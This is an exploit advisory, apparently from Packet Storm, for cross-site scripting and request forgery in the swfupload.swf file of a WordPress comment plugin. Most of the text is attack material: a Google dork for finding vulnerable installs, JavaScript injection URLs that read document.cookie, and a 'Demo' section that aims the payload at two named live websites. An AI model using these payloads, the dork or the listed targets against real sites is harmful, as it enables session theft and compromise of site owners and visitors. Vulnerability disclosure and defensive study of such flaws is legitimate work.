WordPress Comment Extra Fields plugin version 1.7 suffers from cross site request forgery and cross site scripting vulnerabilities.
7a727d84c9a3ea04dbf0bfc83f7d36113284c9a82dc85b33105a1d6862f47f55##################################################
# Description : Wordpress Plugins - Comment Extra Fields <== XSS
# Version : 1.7
# Link : http://wordpress.org/extend/plugins/comment-extra-field/
# Plugins : http://downloads.wordpress.org/plugin/comment-extra-field.1.7.zip
# Date : 8-1-2013
# Google Dork : inurl:/wp-content/plugins/comment-extra-field/
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################
# Description :
================
JavaScript Code injecton (XSRF/XSS) .
remote attacker can include a remote Images or exec some JS code.
# PoC
=====
=> XSRF/XSS Injection :
http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('XSS');//
http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a
href='javascript:alert(document.cookie)'>Click me</a>
# Demo:
=======
http://cscmail.net/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a
href='javascript:alert(document.cookie)'>Click me</a>
http://fitest.sitewalla.com/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a
href='javascript:alert(document.cookie)'>Click me</a>
# Thanks
=========
CyberSEC Team - TBD - 1337day - PacketStormSecurity
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed